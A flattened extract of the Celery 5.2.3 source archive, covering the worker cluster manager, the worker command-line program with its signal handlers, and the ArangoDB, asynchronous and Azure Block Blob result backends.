Pidfile(self.pidfile).read_pid() except ValueError: pass @pid.setter def pid(self, value): self._pid = value @cached_property def executable(self): return self.options['--executable'] @cached_property def argv_with_executable(self): return (self.executable,) + self.argv @classmethod def from_kwargs(cls, name, **kwargs): return cls(name, options=_kwargs_to_command_line(kwargs)) def maybe_call(fun, *args, **kwargs): if fun is not None: fun(*args, **kwargs) class MultiParser: Node = Node def __init__(self, cmd='celery worker', append='', prefix='', suffix='', range_prefix='celery'): self.cmd = cmd self.append = append self.prefix = prefix self.suffix = suffix self.range_prefix = range_prefix def parse(self, p): names = p.values options = dict(p.options) ranges = len(names) == 1 prefix = self.prefix cmd = options.pop('--cmd', self.cmd) append = options.pop('--append', self.append) hostname = options.pop('--hostname', options.pop('-n', gethostname())) prefix = options.pop('--prefix', prefix) or '' suffix = options.pop('--suffix', self.suffix) or hostname suffix = '' if suffix in ('""', "''") else suffix range_prefix = options.pop('--range-prefix', '') or self.range_prefix if ranges: try: names, prefix = self._get_ranges(names), range_prefix except ValueError: pass self._update_ns_opts(p, names) self._update_ns_ranges(p, ranges) return ( self._node_from_options( p, name, prefix, suffix, cmd, append, options) for name in names ) def _node_from_options(self, p, name, prefix, suffix, cmd, append, options): namespace, nodename, _ = build_nodename(name, prefix, suffix) namespace = nodename if nodename in p.namespaces else namespace return Node(nodename, cmd, append, p.optmerge(namespace, options), p.passthrough) def _get_ranges(self, names): noderange = int(names[0]) return [str(n) for n in range(1, noderange + 1)] def _update_ns_opts(self, p, names): # Numbers in args always refers to the index in the list of names. # (e.g., `start foo bar baz -c:1` where 1 is foo, 2 is bar, and so on). 
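# Illustration (hedged; the command line is hypothetical):
#
#     start foo bar baz -c:2 8
#
# parses {'-c': '8'} into the namespace '2', which the loop below
# re-keys onto names[1] ('bar'), so only that node is started with -c 8.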
for ns_name, ns_opts in list(p.namespaces.items()): if ns_name.isdigit(): ns_index = int(ns_name) - 1 if ns_index < 0: raise KeyError(f'Indexes start at 1 got: {ns_name!r}') try: p.namespaces[names[ns_index]].update(ns_opts) except IndexError: raise KeyError(f'No node at index {ns_name!r}') def _update_ns_ranges(self, p, ranges): for ns_name, ns_opts in list(p.namespaces.items()): if ',' in ns_name or (ranges and '-' in ns_name): for subns in self._parse_ns_range(ns_name, ranges): p.namespaces[subns].update(ns_opts) p.namespaces.pop(ns_name) def _parse_ns_range(self, ns, ranges=False): ret = [] for space in ',' in ns and ns.split(',') or [ns]: if ranges and '-' in space: start, stop = space.split('-') ret.extend( str(n) for n in range(int(start), int(stop) + 1) ) else: ret.append(space) return ret class Cluster(UserList): """Represent a cluster of workers.""" def __init__(self, nodes, cmd=None, env=None, on_stopping_preamble=None, on_send_signal=None, on_still_waiting_for=None, on_still_waiting_progress=None, on_still_waiting_end=None, on_node_start=None, on_node_restart=None, on_node_shutdown_ok=None, on_node_status=None, on_node_signal=None, on_node_signal_dead=None, on_node_down=None, on_child_spawn=None, on_child_signalled=None, on_child_failure=None): self.nodes = nodes self.cmd = cmd or celery_exe('worker') self.env = env self.on_stopping_preamble = on_stopping_preamble self.on_send_signal = on_send_signal self.on_still_waiting_for = on_still_waiting_for self.on_still_waiting_progress = on_still_waiting_progress self.on_still_waiting_end = on_still_waiting_end self.on_node_start = on_node_start self.on_node_restart = on_node_restart self.on_node_shutdown_ok = on_node_shutdown_ok self.on_node_status = on_node_status self.on_node_signal = on_node_signal self.on_node_signal_dead = on_node_signal_dead self.on_node_down = on_node_down self.on_child_spawn = on_child_spawn self.on_child_signalled = on_child_signalled self.on_child_failure = on_child_failure def start(self): return [self.start_node(node) for node in self] def start_node(self, node): maybe_call(self.on_node_start, node) retcode = self._start_node(node) maybe_call(self.on_node_status, node, retcode) return retcode def _start_node(self, node): return node.start( self.env, on_spawn=self.on_child_spawn, on_signalled=self.on_child_signalled, on_failure=self.on_child_failure, ) def send_all(self, sig): for node in self.getpids(on_down=self.on_node_down): maybe_call(self.on_node_signal, node, signal_name(sig)) node.send(sig, self.on_node_signal_dead) def kill(self): return self.send_all(signal.SIGKILL) def restart(self, sig=signal.SIGTERM): retvals = [] def restart_on_down(node): maybe_call(self.on_node_restart, node) retval = self._start_node(node) maybe_call(self.on_node_status, node, retval) retvals.append(retval) self._stop_nodes(retry=2, on_down=restart_on_down, sig=sig) return retvals def stop(self, retry=None, callback=None, sig=signal.SIGTERM): return self._stop_nodes(retry=retry, on_down=callback, sig=sig) def stopwait(self, retry=2, callback=None, sig=signal.SIGTERM): return self._stop_nodes(retry=retry, on_down=callback, sig=sig) def _stop_nodes(self, retry=None, on_down=None, sig=signal.SIGTERM): on_down = on_down if on_down is not None else self.on_node_down nodes = list(self.getpids(on_down=on_down)) if nodes: for node in self.shutdown_nodes(nodes, sig=sig, retry=retry): maybe_call(on_down, node) def shutdown_nodes(self, nodes, sig=signal.SIGTERM, retry=None): P = set(nodes) maybe_call(self.on_stopping_preamble, nodes) 
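# First pass: send `sig` to every node, yielding the ones whose pid is
# already gone (send() returned a falsy value).  If `retry` is given,
# the remaining nodes are then polled with alive() and yielded as they
# exit, sleeping `retry` seconds roughly once per pass over the
# remaining set.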
to_remove = set() for node in P: maybe_call(self.on_send_signal, node, signal_name(sig)) if not node.send(sig, self.on_node_signal_dead): to_remove.add(node) yield node P -= to_remove if retry: maybe_call(self.on_still_waiting_for, P) its = 0 while P: to_remove = set() for node in P: its += 1 maybe_call(self.on_still_waiting_progress, P) if not node.alive(): maybe_call(self.on_node_shutdown_ok, node) to_remove.add(node) yield node maybe_call(self.on_still_waiting_for, P) break P -= to_remove if P and not its % len(P): sleep(float(retry)) maybe_call(self.on_still_waiting_end) def find(self, name): for node in self: if node.name == name: return node raise KeyError(name) def getpids(self, on_down=None): for node in self: if node.pid: yield node else: maybe_call(on_down, node) def __repr__(self): return '<{name}({0}): {1}>'.format( len(self), saferepr([n.name for n in self]), name=type(self).__name__, ) @property def data(self): return self.nodes ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/apps/worker.py0000664000175000017500000003222700000000000017014 0ustar00asifasif00000000000000"""Worker command-line program. This module is the 'program-version' of :mod:`celery.worker`. It does everything necessary to run that module as an actual application, like installing signal handlers, platform tweaks, and so on. """ import logging import os import platform as _platform import sys from datetime import datetime from functools import partial from billiard.common import REMAP_SIGTERM from billiard.process import current_process from kombu.utils.encoding import safe_str from celery import VERSION_BANNER, platforms, signals from celery.app import trace from celery.exceptions import WorkerShutdown, WorkerTerminate from celery.loaders.app import AppLoader from celery.platforms import EX_FAILURE, EX_OK, check_privileges, isatty from celery.utils import static, term from celery.utils.debug import cry from celery.utils.imports import qualname from celery.utils.log import get_logger, in_sighandler, set_in_sighandler from celery.utils.text import pluralize from celery.worker import WorkController __all__ = ('Worker',) logger = get_logger(__name__) is_jython = sys.platform.startswith('java') is_pypy = hasattr(sys, 'pypy_version_info') ARTLINES = [ ' --------------', '--- ***** -----', '-- ******* ----', '- *** --- * ---', '- ** ----------', '- ** ----------', '- ** ----------', '- ** ----------', '- *** --- * ---', '-- ******* ----', '--- ***** -----', ' --------------', ] BANNER = """\ {hostname} v{version} {platform} {timestamp} [config] .> app: {app} .> transport: {conninfo} .> results: {results} .> concurrency: {concurrency} .> task events: {events} [queues] {queues} """ EXTRA_INFO_FMT = """ [tasks] {tasks} """ def active_thread_count(): from threading import enumerate return sum(1 for t in enumerate() if not t.name.startswith('Dummy-')) def safe_say(msg): print(f'\n{msg}', file=sys.__stderr__, flush=True) class Worker(WorkController): """Worker as a program.""" def on_before_init(self, quiet=False, **kwargs): self.quiet = quiet trace.setup_worker_optimizations(self.app, self.hostname) # this signal can be used to set up configuration for # workers by name. 
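# A hedged sketch of such a handler (user code, not part of this
# module); connecting with sender=<nodename> limits it to one worker:
#
#     @signals.celeryd_init.connect(sender='worker12@example.com')
#     def configure_worker12(conf=None, **kwargs):
#         conf.worker_prefetch_multiplier = 1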
signals.celeryd_init.send( sender=self.hostname, instance=self, conf=self.app.conf, options=kwargs, ) check_privileges(self.app.conf.accept_content) def on_after_init(self, purge=False, no_color=None, redirect_stdouts=None, redirect_stdouts_level=None, **kwargs): self.redirect_stdouts = self.app.either( 'worker_redirect_stdouts', redirect_stdouts) self.redirect_stdouts_level = self.app.either( 'worker_redirect_stdouts_level', redirect_stdouts_level) super().setup_defaults(**kwargs) self.purge = purge self.no_color = no_color self._isatty = isatty(sys.stdout) self.colored = self.app.log.colored( self.logfile, enabled=not no_color if no_color is not None else no_color ) def on_init_blueprint(self): self._custom_logging = self.setup_logging() # apply task execution optimizations # -- This will finalize the app! trace.setup_worker_optimizations(self.app, self.hostname) def on_start(self): app = self.app super().on_start() # this signal can be used to, for example, change queues after # the -Q option has been applied. signals.celeryd_after_setup.send( sender=self.hostname, instance=self, conf=app.conf, ) if self.purge: self.purge_messages() if not self.quiet: self.emit_banner() self.set_process_status('-active-') self.install_platform_tweaks(self) if not self._custom_logging and self.redirect_stdouts: app.log.redirect_stdouts(self.redirect_stdouts_level) # TODO: Remove the following code in Celery 6.0 # This qualifies as a hack for issue #6366. warn_deprecated = True config_source = app._config_source if isinstance(config_source, str): # Don't raise the warning when the settings originate from # django.conf:settings warn_deprecated = config_source.lower() not in [ 'django.conf:settings', ] if warn_deprecated: if app.conf.maybe_warn_deprecated_settings(): logger.warning( "Please run `celery upgrade settings path/to/settings.py` " "to avoid these warnings and to allow a smoother upgrade " "to Celery 6.0." ) def emit_banner(self): # Dump configuration to screen so we have some basic information # for when users sends bug reports. use_image = term.supports_images() if use_image: print(term.imgcat(static.logo())) print(safe_str(''.join([ str(self.colored.cyan( ' \n', self.startup_info(artlines=not use_image))), str(self.colored.reset(self.extra_info() or '')), ])), file=sys.__stdout__, flush=True) def on_consumer_ready(self, consumer): signals.worker_ready.send(sender=consumer) logger.info('%s ready.', safe_str(self.hostname)) def setup_logging(self, colorize=None): if colorize is None and self.no_color is not None: colorize = not self.no_color return self.app.log.setup( self.loglevel, self.logfile, redirect_stdouts=False, colorize=colorize, hostname=self.hostname, ) def purge_messages(self): with self.app.connection_for_write() as connection: count = self.app.control.purge(connection=connection) if count: # pragma: no cover print(f"purge: Erased {count} {pluralize(count, 'message')} from the queue.\n", flush=True) def tasklist(self, include_builtins=True, sep='\n', int_='celery.'): return sep.join( f' . 
{task}' for task in sorted(self.app.tasks) if (not task.startswith(int_) if not include_builtins else task) ) def extra_info(self): if self.loglevel is None: return if self.loglevel <= logging.INFO: include_builtins = self.loglevel <= logging.DEBUG tasklist = self.tasklist(include_builtins=include_builtins) return EXTRA_INFO_FMT.format(tasks=tasklist) def startup_info(self, artlines=True): app = self.app concurrency = str(self.concurrency) appr = '{}:{:#x}'.format(app.main or '__main__', id(app)) if not isinstance(app.loader, AppLoader): loader = qualname(app.loader) if loader.startswith('celery.loaders'): # pragma: no cover loader = loader[14:] appr += f' ({loader})' if self.autoscale: max, min = self.autoscale concurrency = f'{{min={min}, max={max}}}' pool = self.pool_cls if not isinstance(pool, str): pool = pool.__module__ concurrency += f" ({pool.split('.')[-1]})" events = 'ON' if not self.task_events: events = 'OFF (enable -E to monitor tasks in this worker)' banner = BANNER.format( app=appr, hostname=safe_str(self.hostname), timestamp=datetime.now().replace(microsecond=0), version=VERSION_BANNER, conninfo=self.app.connection().as_uri(), results=self.app.backend.as_uri(), concurrency=concurrency, platform=safe_str(_platform.platform()), events=events, queues=app.amqp.queues.format(indent=0, indent_first=False), ).splitlines() # integrate the ASCII art. if artlines: for i, _ in enumerate(banner): try: banner[i] = ' '.join([ARTLINES[i], banner[i]]) except IndexError: banner[i] = ' ' * 16 + banner[i] return '\n'.join(banner) + '\n' def install_platform_tweaks(self, worker): """Install platform specific tweaks and workarounds.""" if self.app.IS_macOS: self.macOS_proxy_detection_workaround() # Install signal handler so SIGHUP restarts the worker. if not self._isatty: # only install HUP handler if detached from terminal, # so closing the terminal window doesn't restart the worker # into the background. if self.app.IS_macOS: # macOS can't exec from a process using threads. 
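# (Restarting on SIGHUP ultimately calls os.execv() via
# _reload_current_worker(), which is not safe on macOS once threads
# are running, so a handler that merely warns is installed instead.)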
# See https://github.com/celery/celery/issues#issue/152 install_HUP_not_supported_handler(worker) else: install_worker_restart_handler(worker) install_worker_term_handler(worker) install_worker_term_hard_handler(worker) install_worker_int_handler(worker) install_cry_handler() install_rdb_handler() def macOS_proxy_detection_workaround(self): """See https://github.com/celery/celery/issues#issue/161.""" os.environ.setdefault('celery_dummy_proxy', 'set_by_celeryd') def set_process_status(self, info): return platforms.set_mp_process_title( 'celeryd', info=f'{info} ({platforms.strargv(sys.argv)})', hostname=self.hostname, ) def _shutdown_handler(worker, sig='TERM', how='Warm', exc=WorkerShutdown, callback=None, exitcode=EX_OK): def _handle_request(*args): with in_sighandler(): from celery.worker import state if current_process()._name == 'MainProcess': if callback: callback(worker) safe_say(f'worker: {how} shutdown (MainProcess)') signals.worker_shutting_down.send( sender=worker.hostname, sig=sig, how=how, exitcode=exitcode, ) if active_thread_count() > 1: setattr(state, {'Warm': 'should_stop', 'Cold': 'should_terminate'}[how], exitcode) else: raise exc(exitcode) _handle_request.__name__ = str(f'worker_{how}') platforms.signals[sig] = _handle_request if REMAP_SIGTERM == "SIGQUIT": install_worker_term_handler = partial( _shutdown_handler, sig='SIGTERM', how='Cold', exc=WorkerTerminate, exitcode=EX_FAILURE, ) else: install_worker_term_handler = partial( _shutdown_handler, sig='SIGTERM', how='Warm', exc=WorkerShutdown, ) if not is_jython: # pragma: no cover install_worker_term_hard_handler = partial( _shutdown_handler, sig='SIGQUIT', how='Cold', exc=WorkerTerminate, exitcode=EX_FAILURE, ) else: # pragma: no cover install_worker_term_handler = \ install_worker_term_hard_handler = lambda *a, **kw: None def on_SIGINT(worker): safe_say('worker: Hitting Ctrl+C again will terminate all running tasks!') install_worker_term_hard_handler(worker, sig='SIGINT') if not is_jython: # pragma: no cover install_worker_int_handler = partial( _shutdown_handler, sig='SIGINT', callback=on_SIGINT, exitcode=EX_FAILURE, ) else: # pragma: no cover def install_worker_int_handler(*args, **kwargs): pass def _reload_current_worker(): platforms.close_open_fds([ sys.__stdin__, sys.__stdout__, sys.__stderr__, ]) os.execv(sys.executable, [sys.executable] + sys.argv) def install_worker_restart_handler(worker, sig='SIGHUP'): def restart_worker_sig_handler(*args): """Signal handler restarting the current python program.""" set_in_sighandler(True) safe_say(f"Restarting celery worker ({' '.join(sys.argv)})") import atexit atexit.register(_reload_current_worker) from celery.worker import state state.should_stop = EX_OK platforms.signals[sig] = restart_worker_sig_handler def install_cry_handler(sig='SIGUSR1'): # PyPy does not have sys._current_frames if is_pypy: # pragma: no cover return def cry_handler(*args): """Signal handler logging the stack-trace of all active threads.""" with in_sighandler(): safe_say(cry()) platforms.signals[sig] = cry_handler def install_rdb_handler(envvar='CELERY_RDBSIG', sig='SIGUSR2'): # pragma: no cover def rdb_handler(*args): """Signal handler setting a rdb breakpoint at the current frame.""" with in_sighandler(): from celery.contrib.rdb import _frame, set_trace # gevent does not pass standard signal handler args frame = args[1] if args else _frame().f_back set_trace(frame) if os.environ.get(envvar): platforms.signals[sig] = rdb_handler def install_HUP_not_supported_handler(worker, sig='SIGHUP'): def 
warn_on_HUP_handler(signum, frame): with in_sighandler(): safe_say('{sig} not supported: Restarting with {sig} is ' 'unstable on this platform!'.format(sig=sig)) platforms.signals[sig] = warn_on_HUP_handler ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3997498 celery-5.2.3/celery/backends/0000775000175000017500000000000000000000000015732 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/__init__.py0000664000175000017500000000002700000000000020042 0ustar00asifasif00000000000000"""Result Backends.""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/arangodb.py0000664000175000017500000001707100000000000020067 0ustar00asifasif00000000000000"""ArangoDb result store backend.""" # pylint: disable=W1202,W0703 import json import logging from datetime import timedelta from kombu.utils.objects import cached_property from kombu.utils.url import _parse_url from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: from pyArango import connection as py_arango_connection from pyArango.theExceptions import AQLQueryError except ImportError: py_arango_connection = AQLQueryError = None __all__ = ('ArangoDbBackend',) class ArangoDbBackend(KeyValueStoreBackend): """ArangoDb backend. Sample url "arangodb://username:password@host:port/database/collection" *arangodb_backend_settings* is where the settings are present (in the app.conf) Settings should contain the host, port, username, password, database name, collection name else the default will be chosen. Default database name and collection name is celery. Raises ------ celery.exceptions.ImproperlyConfigured: if module :pypi:`pyArango` is not available. 
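Example (illustrative values only; any of these keys may be omitted to
fall back to the defaults above)::

    app.conf.arangodb_backend_settings = {
        'host': 'localhost',
        'port': '8529',
        'database': 'celery',
        'collection': 'celery',
        'username': 'user',
        'password': 'secret',
        'http_protocol': 'http',
        'verify': False,
    }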
""" host = '127.0.0.1' port = '8529' database = 'celery' collection = 'celery' username = None password = None # protocol is not supported in backend url (http is taken as default) http_protocol = 'http' verify = False # Use str as arangodb key not bytes key_t = str def __init__(self, url=None, *args, **kwargs): """Parse the url or load the settings from settings object.""" super().__init__(*args, **kwargs) if py_arango_connection is None: raise ImproperlyConfigured( 'You need to install the pyArango library to use the ' 'ArangoDb backend.', ) self.url = url if url is None: host = port = database = collection = username = password = None else: ( _schema, host, port, username, password, database_collection, _query ) = _parse_url(url) if database_collection is None: database = collection = None else: database, collection = database_collection.split('/') config = self.app.conf.get('arangodb_backend_settings', None) if config is not None: if not isinstance(config, dict): raise ImproperlyConfigured( 'ArangoDb backend settings should be grouped in a dict', ) else: config = {} self.host = host or config.get('host', self.host) self.port = int(port or config.get('port', self.port)) self.http_protocol = config.get('http_protocol', self.http_protocol) self.verify = config.get('verify', self.verify) self.database = database or config.get('database', self.database) self.collection = \ collection or config.get('collection', self.collection) self.username = username or config.get('username', self.username) self.password = password or config.get('password', self.password) self.arangodb_url = "{http_protocol}://{host}:{port}".format( http_protocol=self.http_protocol, host=self.host, port=self.port ) self._connection = None @property def connection(self): """Connect to the arangodb server.""" if self._connection is None: self._connection = py_arango_connection.Connection( arangoURL=self.arangodb_url, username=self.username, password=self.password, verify=self.verify ) return self._connection @property def db(self): """Database Object to the given database.""" return self.connection[self.database] @cached_property def expires_delta(self): return timedelta(seconds=self.expires) def get(self, key): try: logging.debug( 'RETURN DOCUMENT("{collection}/{key}").task'.format( collection=self.collection, key=key ) ) query = self.db.AQLQuery( 'RETURN DOCUMENT("{collection}/{key}").task'.format( collection=self.collection, key=key ) ) result = query.response["result"][0] if result is None: return None return json.dumps(result) except AQLQueryError as aql_err: logging.error(aql_err) return None except Exception as err: logging.error(err) return None def set(self, key, value): """Insert a doc with value into task attribute and _key as key.""" try: logging.debug( 'INSERT {{ task: {task}, _key: "{key}" }} INTO {collection}' .format( collection=self.collection, key=key, task=value ) ) self.db.AQLQuery( 'INSERT {{ task: {task}, _key: "{key}" }} INTO {collection}' .format( collection=self.collection, key=key, task=value ) ) except AQLQueryError as aql_err: logging.error(aql_err) except Exception as err: logging.error(err) def mget(self, keys): try: json_keys = json.dumps(keys) logging.debug( """ FOR key in {keys} RETURN DOCUMENT(CONCAT("{collection}/", key).task """.format( collection=self.collection, keys=json_keys ) ) query = self.db.AQLQuery( """ FOR key in {keys} RETURN DOCUMENT(CONCAT("{collection}/", key).task """.format( collection=self.collection, keys=json_keys ) ) results = [] while True: 
results.extend(query.response['result']) query.nextBatch() except StopIteration: values = [ result if result is None else json.dumps(result) for result in results ] return values except AQLQueryError as aql_err: logging.error(aql_err) return [None] * len(keys) except Exception as err: logging.error(err) return [None] * len(keys) def delete(self, key): try: logging.debug( 'REMOVE {{ _key: "{key}" }} IN {collection}'.format( key=key, collection=self.collection ) ) self.db.AQLQuery( 'REMOVE {{ _key: "{key}" }} IN {collection}'.format( key=key, collection=self.collection ) ) except AQLQueryError as aql_err: logging.error(aql_err) except Exception as err: logging.error(err) def cleanup(self): """Delete expired meta-data.""" remove_before = (self.app.now() - self.expires_delta).isoformat() try: query = ( 'FOR item IN {collection} ' 'FILTER item.task.date_done < "{remove_before}" ' 'REMOVE item IN {collection}' ).format(collection=self.collection, remove_before=remove_before) logging.debug(query) self.db.AQLQuery(query) except AQLQueryError as aql_err: logging.error(aql_err) except Exception as err: logging.error(err) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/backends/asynchronous.py0000664000175000017500000002410500000000000021041 0ustar00asifasif00000000000000"""Async I/O backend support utilities.""" import socket import threading import time from collections import deque from queue import Empty from time import sleep from weakref import WeakKeyDictionary from kombu.utils.compat import detect_environment from celery import states from celery.exceptions import TimeoutError from celery.utils.threads import THREAD_TIMEOUT_MAX __all__ = ( 'AsyncBackendMixin', 'BaseResultConsumer', 'Drainer', 'register_drainer', ) drainers = {} def register_drainer(name): """Decorator used to register a new result drainer type.""" def _inner(cls): drainers[name] = cls return cls return _inner @register_drainer('default') class Drainer: """Result draining service.""" def __init__(self, result_consumer): self.result_consumer = result_consumer def start(self): pass def stop(self): pass def drain_events_until(self, p, timeout=None, interval=1, on_interval=None, wait=None): wait = wait or self.result_consumer.drain_events time_start = time.monotonic() while 1: # Total time spent may exceed a single call to wait() if timeout and time.monotonic() - time_start >= timeout: raise socket.timeout() try: yield self.wait_for(p, wait, timeout=interval) except socket.timeout: pass if on_interval: on_interval() if p.ready: # got event on the wanted channel. 
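# Each iteration blocks for at most `interval` seconds in wait_for();
# a socket.timeout from that call is swallowed so that on_interval()
# can run and the overall `timeout` check at the top of the loop can
# still raise.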
break def wait_for(self, p, wait, timeout=None): wait(timeout=timeout) class greenletDrainer(Drainer): spawn = None _g = None _drain_complete_event = None # event, sended (and recreated) after every drain_events iteration def _create_drain_complete_event(self): """create new self._drain_complete_event object""" pass def _send_drain_complete_event(self): """raise self._drain_complete_event for wakeup .wait_for""" pass def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._started = threading.Event() self._stopped = threading.Event() self._shutdown = threading.Event() self._create_drain_complete_event() def run(self): self._started.set() while not self._stopped.is_set(): try: self.result_consumer.drain_events(timeout=1) self._send_drain_complete_event() self._create_drain_complete_event() except socket.timeout: pass self._shutdown.set() def start(self): if not self._started.is_set(): self._g = self.spawn(self.run) self._started.wait() def stop(self): self._stopped.set() self._send_drain_complete_event() self._shutdown.wait(THREAD_TIMEOUT_MAX) def wait_for(self, p, wait, timeout=None): self.start() if not p.ready: self._drain_complete_event.wait(timeout=timeout) @register_drainer('eventlet') class eventletDrainer(greenletDrainer): def spawn(self, func): from eventlet import sleep, spawn g = spawn(func) sleep(0) return g def _create_drain_complete_event(self): from eventlet.event import Event self._drain_complete_event = Event() def _send_drain_complete_event(self): self._drain_complete_event.send() @register_drainer('gevent') class geventDrainer(greenletDrainer): def spawn(self, func): import gevent g = gevent.spawn(func) gevent.sleep(0) return g def _create_drain_complete_event(self): from gevent.event import Event self._drain_complete_event = Event() def _send_drain_complete_event(self): self._drain_complete_event.set() self._create_drain_complete_event() class AsyncBackendMixin: """Mixin for backends that enables the async API.""" def _collect_into(self, result, bucket): self.result_consumer.buckets[result] = bucket def iter_native(self, result, no_ack=True, **kwargs): self._ensure_not_eager() results = result.results if not results: raise StopIteration() # we tell the result consumer to put consumed results # into these buckets. 
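# Result nodes that have no `_cache` attribute, or that already carry a
# cached state, go straight into the bucket; the rest are registered via
# _collect_into() so the result consumer appends them to the same deque
# as their messages arrive.  A rough usage sketch (`group_result` and
# `handle` are illustrative names):
#
#     >>> for task_id, meta in backend.iter_native(group_result):
#     ...     handle(task_id, meta)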
bucket = deque() for node in results: if not hasattr(node, '_cache'): bucket.append(node) elif node._cache: bucket.append(node) else: self._collect_into(node, bucket) for _ in self._wait_for_pending(result, no_ack=no_ack, **kwargs): while bucket: node = bucket.popleft() if not hasattr(node, '_cache'): yield node.id, node.children else: yield node.id, node._cache while bucket: node = bucket.popleft() yield node.id, node._cache def add_pending_result(self, result, weak=False, start_drainer=True): if start_drainer: self.result_consumer.drainer.start() try: self._maybe_resolve_from_buffer(result) except Empty: self._add_pending_result(result.id, result, weak=weak) return result def _maybe_resolve_from_buffer(self, result): result._maybe_set_cache(self._pending_messages.take(result.id)) def _add_pending_result(self, task_id, result, weak=False): concrete, weak_ = self._pending_results if task_id not in weak_ and result.id not in concrete: (weak_ if weak else concrete)[task_id] = result self.result_consumer.consume_from(task_id) def add_pending_results(self, results, weak=False): self.result_consumer.drainer.start() return [self.add_pending_result(result, weak=weak, start_drainer=False) for result in results] def remove_pending_result(self, result): self._remove_pending_result(result.id) self.on_result_fulfilled(result) return result def _remove_pending_result(self, task_id): for mapping in self._pending_results: mapping.pop(task_id, None) def on_result_fulfilled(self, result): self.result_consumer.cancel_for(result.id) def wait_for_pending(self, result, callback=None, propagate=True, **kwargs): self._ensure_not_eager() for _ in self._wait_for_pending(result, **kwargs): pass return result.maybe_throw(callback=callback, propagate=propagate) def _wait_for_pending(self, result, timeout=None, on_interval=None, on_message=None, **kwargs): return self.result_consumer._wait_for_pending( result, timeout=timeout, on_interval=on_interval, on_message=on_message, **kwargs ) @property def is_async(self): return True class BaseResultConsumer: """Manager responsible for consuming result messages.""" def __init__(self, backend, app, accept, pending_results, pending_messages): self.backend = backend self.app = app self.accept = accept self._pending_results = pending_results self._pending_messages = pending_messages self.on_message = None self.buckets = WeakKeyDictionary() self.drainer = drainers[detect_environment()](self) def start(self, initial_task_id, **kwargs): raise NotImplementedError() def stop(self): pass def drain_events(self, timeout=None): raise NotImplementedError() def consume_from(self, task_id): raise NotImplementedError() def cancel_for(self, task_id): raise NotImplementedError() def _after_fork(self): self.buckets.clear() self.buckets = WeakKeyDictionary() self.on_message = None self.on_after_fork() def on_after_fork(self): pass def drain_events_until(self, p, timeout=None, on_interval=None): return self.drainer.drain_events_until( p, timeout=timeout, on_interval=on_interval) def _wait_for_pending(self, result, timeout=None, on_interval=None, on_message=None, **kwargs): self.on_wait_for_pending(result, timeout=timeout, **kwargs) prev_on_m, self.on_message = self.on_message, on_message try: for _ in self.drain_events_until( result.on_ready, timeout=timeout, on_interval=on_interval): yield sleep(0) except socket.timeout: raise TimeoutError('The operation timed out.') finally: self.on_message = prev_on_m def on_wait_for_pending(self, result, timeout=None, **kwargs): pass def 
on_out_of_band_result(self, message): self.on_state_change(message.payload, message) def _get_pending_result(self, task_id): for mapping in self._pending_results: try: return mapping[task_id] except KeyError: pass raise KeyError(task_id) def on_state_change(self, meta, message): if self.on_message: self.on_message(meta) if meta['status'] in states.READY_STATES: task_id = meta['task_id'] try: result = self._get_pending_result(task_id) except KeyError: # send to buffer in case we received this result # before it was added to _pending_results. self._pending_messages.put(task_id, meta) else: result._maybe_set_cache(meta) buckets = self.buckets try: # remove bucket for this result, since it's fulfilled bucket = buckets.pop(result) except KeyError: pass else: # send to waiter via bucket bucket.append(result) sleep(0) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/azureblockblob.py0000664000175000017500000001206000000000000021303 0ustar00asifasif00000000000000"""The Azure Storage Block Blob backend for Celery.""" from kombu.utils import cached_property from kombu.utils.encoding import bytes_to_str from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger from .base import KeyValueStoreBackend try: import azure.storage.blob as azurestorage from azure.core.exceptions import (ResourceExistsError, ResourceNotFoundError) from azure.storage.blob import BlobServiceClient except ImportError: azurestorage = None __all__ = ("AzureBlockBlobBackend",) LOGGER = get_logger(__name__) AZURE_BLOCK_BLOB_CONNECTION_PREFIX = 'azureblockblob://' class AzureBlockBlobBackend(KeyValueStoreBackend): """Azure Storage Block Blob backend for Celery.""" def __init__(self, url=None, container_name=None, *args, **kwargs): super().__init__(*args, **kwargs) if azurestorage is None or azurestorage.__version__ < '12': raise ImproperlyConfigured( "You need to install the azure-storage-blob v12 library to" "use the AzureBlockBlob backend") conf = self.app.conf self._connection_string = self._parse_url(url) self._container_name = ( container_name or conf["azureblockblob_container_name"]) self.base_path = conf.get('azureblockblob_base_path', '') self._connection_timeout = conf.get( 'azureblockblob_connection_timeout', 20 ) self._read_timeout = conf.get('azureblockblob_read_timeout', 120) @classmethod def _parse_url(cls, url, prefix=AZURE_BLOCK_BLOB_CONNECTION_PREFIX): connection_string = url[len(prefix):] if not connection_string: raise ImproperlyConfigured("Invalid URL") return connection_string @cached_property def _blob_service_client(self): """Return the Azure Storage Blob service client. If this is the first call to the property, the client is created and the container is created if it doesn't yet exist. """ client = BlobServiceClient.from_connection_string( self._connection_string, connection_timeout=self._connection_timeout, read_timeout=self._read_timeout ) try: client.create_container(name=self._container_name) msg = f"Container created with name {self._container_name}." except ResourceExistsError: msg = f"Container with name {self._container_name} already." \ "exists. This will not be created." LOGGER.info(msg) return client def get(self, key): """Read the value stored at the given key. Args: key: The key for which to read the value. 
